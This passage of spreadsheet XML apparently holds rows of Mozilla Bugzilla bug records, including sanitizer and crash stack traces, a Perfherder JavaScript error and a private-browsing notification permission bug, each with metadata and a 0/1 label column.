    #12 0x7f3e0086198b in EnsureCMSInitialized /builds/worker/workspace/obj-build/dist/include/gfxPlatform.h:968:7
    #13 0x7f3e0086198b in GetCMSMode /builds/worker/workspace/obj-build/dist/include/gfxPlatform.h:519:5
    #14 0x7f3e0086198b in nsXPLookAndFeel::GetUncachedColor(mozilla::StyleSystemColor, mozilla::ColorScheme, mozilla::LookAndFeel::UseStandins) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:1012:9
    #15 0x7f3e00860d6f in nsXPLookAndFeel::GetColorValue(mozilla::StyleSystemColor, mozilla::ColorScheme, mozilla::LookAndFeel::UseStandins, unsigned int&amp;) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:992:17
    #16 0x7f3e00866856 in mozilla::LookAndFeel::GetColor(mozilla::StyleSystemColor, mozilla::ColorScheme, mozilla::LookAndFeel::UseStandins) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:1436:47
    #17 0x7f3e0079836c in Color /builds/worker/workspace/obj-build/dist/include/mozilla/LookAndFeel.h:465:12
    #18 0x7f3e0079836c in GetAccentColor /builds/worker/checkouts/gecko/widget/ThemeColors.cpp:91:7
    #19 0x7f3e0079836c in mozilla::widget::ThemeColors::RecomputeAccentColors() /builds/worker/checkouts/gecko/widget/ThemeColors.cpp:195:20
    #20 0x7f3e00797dfd in mozilla::widget::Theme::LookAndFeelChanged() /builds/worker/checkouts/gecko/widget/Theme.cpp:183:3
    #21 0x7f3e0085e90f in nsXPLookAndFeel::GetInstance() /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:408:3
    #22 0x7f3e00867325 in mozilla::LookAndFeel::GetThemeInfo(nsTSubstring&lt;char&gt;&amp;) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:1549:3
    #23 0x7f3df5e5a7b7 in nsSystemInfo::Init() /builds/worker/checkouts/gecko/xpcom/base/nsSystemInfo.cpp:1081:5
    #24 0x7f3df5fafc6f in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:10279:7
    #25 0x7f3df5fdb212 in CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:184:46
    #26 0x7f3df5fdb212 in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::detail::BaseMonitorAutoLock&lt;mozilla::Monitor&gt;&gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:971:17
    #27 0x7f3df5fdc74f in nsComponentManagerImpl::GetService(mozilla::xpcom::ModuleID, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1061:10
    #28 0x7f3df5fc323d in mozilla::xpcom::GetServiceHelper::operator()(nsID const&amp;, void**) const /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:13058:50
    #29 0x7f3df7db11ea in assign_from_helper /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:897:7
    #30 0x7f3df7db11ea in nsCOMPtr /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:533:5
    #31 0x7f3df7db11ea in GetServiceImpl /builds/worker/checkouts/gecko/js/xpconnect/src/JSServices.cpp:83:32
    #32 0x7f3df7db11ea in GetService /builds/worker/checkouts/gecko/js/xpconnect/src/JSServices.cpp:130:8
    #33 0x7f3df7db11ea in xpc::Services_Resolve(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, bool*) /builds/worker/checkouts/gecko/js/xpconnect/src/JSServices.cpp:153:25
    #34 0x7f3e06ae326b in CallResolveOp /builds/worker/checkouts/gecko/js/src/vm/NativeObject-inl.h:683:8
    #35 0x7f3e06ae326b in NativeLookupOwnPropertyInline&lt;(js::AllowGC)1, (js::LookupResolveMode)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject-inl.h:795:14
    #36 0x7f3e06ae326b in NativeGetPropertyInline&lt;(js::AllowGC)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2239:10
    #37 0x7f3e06ae326b in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2287:10
    #38 0x7f3e067703f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:118:10
    #39 0x7f3e067703f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:125:10
    #40 0x7f3e067703f9 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:4787:10
    #41 0x7f3e06742b2c in GetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:245:10
    #42 0x7f3e06742b2c in js::Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3050:12
    #43 0x7f3e0672814b in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:400:10
    #44 0x7f3e0672814b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13
    #45 0x7f3e0672958c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:612:13
    #46 0x7f3e0672b506 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:647:10
    #47 0x7f3e0672b506 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:679:8
    #48 0x7f3e0672d356 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:801:10
    #49 0x7f3e06ae3bdd in CallGetter /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2080:12
    #50 0x7f3e06ae3bdd in GetExistingProperty&lt;(js::AllowGC)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2108:12
    #51 0x7f3e06ae3bdd in NativeGetPropertyInline&lt;(js::AllowGC)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2256:14
    #52 0x7f3e06ae3bdd in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2287:10
    #53 0x7f3e067703f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:118:10
    #54 0x7f3e067703f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:125:10
    #55 0x7f3e067703f9 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:4787:10
    #56 0x7f3e06742b2c in GetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:245:10
    #57 0x7f3e06742b2c in js::Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3050:12
    #58 0x7f3e0672814b in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:400:10
    #59 0x7f3e0672814b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13
    #60 0x7f3e0672958c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:612:13
    #61 0x7f3e0672b506 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:647:10
    #62 0x7f3e0672b506 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:679:8
    #63 0x7f3e0687ddc2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:53:10
    #64 0x7f3df7df415d in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedJSClass.cpp:918:17
    #65 0x7f3df60a1959 in PrepareAndDispatch /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:115:37
    #66 0x7f3df60a065a in SharedStub xptcstubs_x86_64_linux.cpp
    #67 0x7f3df5fd3f30 in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*) /builds/worker/checkouts/gecko/xpcom/components/nsCategoryManager.cpp:682:19
    #68 0x7f3e0635e5a9 in nsXREDirProvider::DoStartup() /builds/worker/checkouts/gecko/toolkit/xre/nsXREDirProvider.cpp:830:11
    #69 0x7f3e0633a74e in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5406:18
    #70 0x7f3e0633d254 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5862:8
    #71 0x7f3e0633e451 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5918:21
    #72 0x5569d5c5dfb4 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:227:22
    #73 0x5569d5c5dfb4 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:445:16
    #74 0x7f3e14423a8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:875:5 in memcpy
Shadow bytes around the buggy address:
  0x6310051f3400: 00 00 00 00 00 00 00 00 00 00 00 00 0</t>
        </is>
      </c>
      <c r="X5913" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5914">
      <c r="A5914" t="n">
        <v>1018836</v>
      </c>
      <c r="B5914" t="inlineStr">
        <is>
          <t>2014-06-01 23:17:56 -0700</t>
        </is>
      </c>
      <c r="C5914" t="inlineStr">
        <is>
          <t>Lockscreen fails to respond for a few seconds</t>
        </is>
      </c>
      <c r="D5914" t="inlineStr">
        <is>
          <t>2014-06-06 12:06:01 -0700</t>
        </is>
      </c>
      <c r="E5914" t="n">
        <v>1</v>
      </c>
      <c r="F5914" t="n">
        <v>1</v>
      </c>
      <c r="G5914" t="n">
        <v>6</v>
      </c>
      <c r="H5914" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5914" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5914" t="inlineStr">
        <is>
          <t>Gaia::System::Window Mgmt</t>
        </is>
      </c>
      <c r="K5914" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5914" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5914" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5914" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5914" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5914" t="inlineStr">
        <is>
          <t>[c=effect p= s=2014.06.06.t u=2.0] [systemsfe]</t>
        </is>
      </c>
      <c r="Q5914" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5914" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5914" t="inlineStr">
        <is>
          <t>2.0 S3 (6june)</t>
        </is>
      </c>
      <c r="T5914" t="n">
        <v>1</v>
      </c>
      <c r="U5914" t="n">
        <v>0</v>
      </c>
      <c r="V5914" t="n">
        <v>54</v>
      </c>
      <c r="W5914" t="inlineStr">
        <is>
          <t>Flame 2.0 20140601 (10G-2 base)
When trying to unlock the phone, the lockscreen is unresponsive for 2-3 seconds.  Sometimes it doesn't even render the lockscreen at all and you see just see the translucent overlay and background during that time.</t>
        </is>
      </c>
      <c r="X5914" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5915">
      <c r="A5915" t="n">
        <v>936808</v>
      </c>
      <c r="B5915" t="inlineStr">
        <is>
          <t>2013-11-09 10:27:49 -0800</t>
        </is>
      </c>
      <c r="C5915" t="inlineStr">
        <is>
          <t>Intermittent test_sanitySimpletest.html | application terminated with exit code 11 | application crashed [@ PK11_ImportCert]</t>
        </is>
      </c>
      <c r="D5915" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:25 -0800</t>
        </is>
      </c>
      <c r="E5915" t="n">
        <v>1</v>
      </c>
      <c r="F5915" t="n">
        <v>1</v>
      </c>
      <c r="G5915" t="n">
        <v>3</v>
      </c>
      <c r="H5915" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5915" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5915" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K5915" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5915" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5915" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5915" t="inlineStr">
        <is>
          <t>[fix is speculative; may not actually be fixed][adv-main27+][adv-esr24.3+][qa-]</t>
        </is>
      </c>
      <c r="Q5915" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5915" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5915" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T5915" t="n">
        <v>1</v>
      </c>
      <c r="U5915" t="n">
        <v>0</v>
      </c>
      <c r="V5915" t="n">
        <v>17</v>
      </c>
      <c r="W5915" t="inlineStr">
        <is>
          <t>I'm afraid this might be a regression from yesterday's NSS update. Kai, can you please take a look?
https://tbpl.mozilla.org/php/getParsedLog.php?id=30361293&amp;tree=Mozilla-Aurora
Ubuntu VM 12.04 mozilla-aurora debug test mochitest-1 on 2013-11-08 19:01:10 PST for push 51f5ae29c5de
slave: tst-linux32-ec2-101
19:05:31     INFO -  161 INFO TEST-START | /tests/Harness_sanity/test_sanitySimpletest.html
19:05:32     INFO -  (pkix_CacheCert_Add: PKIX_PL_HashTable_Add for Certs skipped: entry existed
19:05:32     INFO -  (pkix_CacheCert_Add: PKIX_PL_HashTable_Add for Certs skipped: entry existed
19:05:32     INFO -  ++DOMWINDOW == 38 (0xac91dd0) [serial = 45] [outer = 0xaddc9e0]
19:05:32     INFO -  162 INFO TEST-INFO | /tests/Harness_sanity/test_sanitySimpletest.html | Profile::SimpleTestLoadTime: 32
19:05:32     INFO -  163 INFO TEST-INFO | /tests/Harness_sanity/test_sanitySimpletest.html | Logging some info
19:05:32     INFO -  164 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | test ok - This should be true
19:05:32     INFO -  165 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | is() test failed
19:05:32     INFO -  166 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | isnot() test failed
19:05:32     INFO -  167 INFO TEST-KNOWN-FAIL | /tests/Harness_sanity/test_sanitySimpletest.html | test todo - todo() test should not pass
19:05:32     INFO -  168 INFO TEST-KNOWN-FAIL | /tests/Harness_sanity/test_sanitySimpletest.html | test todo_is - got false, expected true
19:05:32     INFO -  169 INFO TEST-KNOWN-FAIL | /tests/Harness_sanity/test_sanitySimpletest.html | test todo_isnot - didn't expect true, but got it
19:05:32     INFO -  170 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | testPluginIsOOP should be bool
19:05:32     INFO -  171 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | Clipboard has the correct value
19:05:32     INFO -  172 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | waitForClipboard should work
19:05:32     INFO -  173 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | createEl did not create element as expected
19:05:32     INFO -  174 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | $ helper did not get element as expected
19:05:32     INFO -  175 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | computedStyle did not get right display value
19:05:32     INFO -  176 INFO TEST-INFO | /tests/Harness_sanity/test_sanitySimpletest.html | Profile::SimpleTestRunTime: 117
19:05:32     INFO -  177 INFO TEST-PASS | /tests/Harness_sanity/test_sanitySimpletest.html | expected uncaught exception - uncaught exception: i am an uncaught exception at :0
19:05:32     INFO -  JavaScript error: , line 0: uncaught exception: i am an uncaught exception
19:05:33  WARNING -  TEST-UNEXPECTED-FAIL | /tests/Harness_sanity/test_sanitySimpletest.html | application terminated with exit code 11
19:05:33     INFO -  INFO | runtests.py | Application ran for: 0:00:26.610075
19:05:33     INFO -  INFO | zombiecheck | Reading PID log: /tmp/tmpHM6CODpidlog
19:05:47  WARNING -  PROCESS-CRASH | /tests/Harness_sanity/test_sanitySimpletest.html | application crashed [@ PK11_ImportCert]
19:05:47     INFO -  Crash dump filename: /tmp/tmpsH6iya/minidumps/4c711747-7f3f-8543-3baf75be-34474794.dmp
19:05:47     INFO -  Operating system: Linux
19:05:47     INFO -                    0.0.0 Linux 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
19:05:47     INFO -  CPU: x86
19:05:47     INFO -       GenuineIntel family 6 model 26 stepping 5
19:05:47     INFO -       1 CPU
19:05:47     INFO -  Crash reason:  SIGSEGV
19:05:47     INFO -  Crash address: 0x14
19:05:47     INFO -  Thread 31 (crashed)
19:05:47     INFO -   0  libnss3.so!PK11_ImportCert [pk11cert.c:51f5ae29c5de : 972 + 0x3]
19:05:47     INFO -      eip = 0xb72d7a38   esp = 0xa10fd000   ebp = 0xa10fd098   ebx = 0xb74086a4
19:05:47     INFO -      esi = 0xa39d0b18   edi = 0xa39d0b20   eax = 0x00000000   ecx = 0xb1400020
19:05:47     INFO -      edx = 0x00000000   efl = 0x00210206
19:05:47     INFO -      Found by: given as instruction pointer in context
19:05:47     INFO -   1  libxul.so!mozilla::psm::::AuthCertificate [SSLServerCertVerification.cpp:51f5ae29c5de : 960 + 0x13]
19:05:47     INFO -      eip = 0xb489a8cb   esp = 0xa10fd0a0   ebp = 0xa10fd118   ebx = 0xb6be96f4
19:05:47     INFO -      esi = 0xa39d6a08   edi = 0x00000000
19:05:47     INFO -      Found by: call frame info
19:05:47     INFO -   2  libxul.so!mozilla::psm::::SSLServerCertVerificationJob::Run [SSLServerCertVerification.cpp:51f5ae29c5de : 1058 + 0x18]
19:05:47     INFO -      eip = 0xb489b6ee   esp = 0xa10fd120   ebp = 0xa10fd198   ebx = 0xb6be96f4
19:05:47     INFO -      esi = 0xb1402308   edi = 0xa10fd158
19:05:47     INFO -      Found by: call frame info
19:05:47     INFO -   3  libxul.so!nsThreadPool::Run() [nsThreadPool.cpp:51f5ae29c5de : 204 + 0x8]
19:05:47     INFO -      eip = 0xb4f3525b   esp = 0xa10fd1a0   ebp = 0xa10fd1f8   ebx = 0xb6be96f4
19:05:47     INFO -      esi = 0xb1402308   edi = 0xa10fd1d8
19:05:47     INFO -      Found by: call frame info
19:05:47     INFO -   4  libxul.so!nsThread::ProcessNextEvent(bool, bool*) [nsThread.cpp:51f5ae29c5de : 622 + 0x13]
19:05:47     INFO -      eip = 0xb4f3260e   esp = 0xa10fd200   ebp = 0xa10fd258   ebx = 0xb6be96f4
19:05:47     INFO -      esi = 0xb145ffe8   edi = 0xa10fd228
19:05:47     INFO -      Found by: call frame info
19:05:47     INFO -   5  libxul.so!NS_ProcessNextEvent(nsIThread*, bool) [nsThreadUtils.cpp:51f5ae29c5de : 251 + 0xf]
19:05:47     INFO -      eip = 0xb4eec1d6   esp = 0xa10fd260   ebp = 0xa10fd298   ebx = 0xb6be96f4
19:05:47     INFO -      esi = 0xb145ffe8   edi = 0xa10fd2c0
19:05:47     INFO -      Found by: call frame info
19:05:47     INFO -   6  libxul.so!nsThread::ThreadFunc(void*) [nsThread.cpp:51f5ae29c5de : 250 + 0x9]
19:05:47     INFO -      eip = 0xb4f33141   esp = 0xa10fd2a0   ebp = 0xa10fd2e8   ebx = 0xb6be96f4
19:05:47     INFO -      esi = 0xb145ffe8   edi = 0xa10fd2c0
19:05:47     INFO -      Found by: call frame info</t>
        </is>
      </c>
      <c r="X5915" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5916">
      <c r="A5916" t="n">
        <v>1469767</v>
      </c>
      <c r="B5916" t="inlineStr">
        <is>
          <t>2018-06-20 00:05:45 -0700</t>
        </is>
      </c>
      <c r="C5916" t="inlineStr">
        <is>
          <t>Untriaged Talos alerts fail to display</t>
        </is>
      </c>
      <c r="D5916" t="inlineStr">
        <is>
          <t>2018-06-20 04:19:04 -0700</t>
        </is>
      </c>
      <c r="E5916" t="n">
        <v>1</v>
      </c>
      <c r="F5916" t="n">
        <v>1</v>
      </c>
      <c r="G5916" t="n">
        <v>7</v>
      </c>
      <c r="H5916" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5916" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5916" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K5916" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5916" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5916" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5916" t="inlineStr"/>
      <c r="Q5916" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5916" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5916" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5916" t="n">
        <v>1</v>
      </c>
      <c r="U5916" t="n">
        <v>0</v>
      </c>
      <c r="V5916" t="n">
        <v>6</v>
      </c>
      <c r="W5916" t="inlineStr">
        <is>
          <t>Production Perfherder dumps an error in the console:
TypeError: le is not iterable Stack trace: addAlertSummaries/&lt;/&lt;/ae.downstreamSummaryIds&lt;@https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js:44:6231 addAlertSummaries/&lt;/&lt;@https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js:44:6108 addAlertSummaries/&lt;@https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js:44:5723 processQueue@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:355504 scheduleProcessQueue/&lt;@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:356170 $digest@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:363866 $apply@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:366141 scheduleApplyAsync/Li&lt;@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:360964 completeOutstandingRequest@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:293392 Browser/Ui.defer/ls&lt;@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:295289
with a TypeError that's saying:
columnNumber: 6231
​
fileName: "https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js"
​
lineNumber: 44
​
message: "le is not iterable"
​
stack: "addAlertSummaries/&lt;/&lt;/ae.downstreamSummaryIds&lt;@https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js:44:6231\naddAlertSummaries/&lt;/&lt;@https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js:44:6108\naddAlertSummaries/&lt;@https://treeherder.mozilla.org/perf.476e6440429d6f7813f6.bundle.js:44:5723\nprocessQueue@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:355504\nscheduleProcessQueue/&lt;@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:356170\n$digest@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:363866\n$apply@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:366141\nscheduleApplyAsync/Li&lt;@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:360964\ncompleteOutstandingRequest@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:293392\nBrowser/Ui.defer/ls&lt;@https://treeherder.mozilla.org/vendor.5f0f241e916dd98c1912.bundle.js:45:295289\n"
I didn't notice this problem yesterday.</t>
        </is>
      </c>
      <c r="X5916" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5917">
      <c r="A5917" t="n">
        <v>1787034</v>
      </c>
      <c r="B5917" t="inlineStr">
        <is>
          <t>2022-08-24 15:08:29 -0700</t>
        </is>
      </c>
      <c r="C5917" t="inlineStr">
        <is>
          <t>The notification permission granted in normal browsing mode also applies to private browsing</t>
        </is>
      </c>
      <c r="D5917" t="inlineStr">
        <is>
          <t>2024-05-30 10:59:53 -0700</t>
        </is>
      </c>
      <c r="E5917" t="n">
        <v>1</v>
      </c>
      <c r="F5917" t="n">
        <v>1</v>
      </c>
      <c r="G5917" t="n">
        <v>2</v>
      </c>
      <c r="H5917" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5917" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J5917" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5917" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5917" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5917" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5917" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5917" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5917" t="inlineStr">
        <is>
          <t>[geckoview:m107] [geckoview:m108][adv-main109+]</t>
        </is>
      </c>
      <c r="Q5917" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5917" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5917" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5917" t="n">
        <v>1</v>
      </c>
      <c r="U5917" t="n">
        <v>0</v>
      </c>
      <c r="V5917" t="n">
        <v>16</v>
      </c>
      <c r="W5917" t="inlineStr">
        <is>
          <t>Originated from bug report https://bugzilla.mozilla.org/show_bug.cgi?id=1784741
In Firefox on Android, the user's allow/deny selection in Normal Browsing Mode is carried over to Private Browsing Mode in Notification Permission. This vulnerability risks allowing the display of notifications that should not be displayed based on different sessions (e.g., past Private Browsing Mode sessions that should have been discarded or sessions in a different browsing mode).</t>
        </is>
      </c>
      <c r="X5917" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5918">
      <c r="A5918" t="n">
        <v>522253</v>
      </c>
      <c r="B5918" t="inlineStr">
        <is>
          <t>2009-10-14 07:51:07 -0700</t>
        </is>
      </c>
      <c r="C5918" t="inlineStr">
        <is>
          <t>Validate the exported XML against a DTD.</t>
        </is>
      </c>
      <c r="D5918" t="inlineStr">
        <is>
          <t>2013-03-19 19:08:55 -0700</t>
        </is>
      </c>
      <c r="E5918" t="n">
        <v>1</v>
      </c>
      <c r="F5918" t="n">
        <v>1</v>
      </c>
      <c r="G5918" t="n">
        <v>4</v>
      </c>
      <c r="H5918" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5918" t="inlineStr">
        <is>
          <t>Webtools</t>
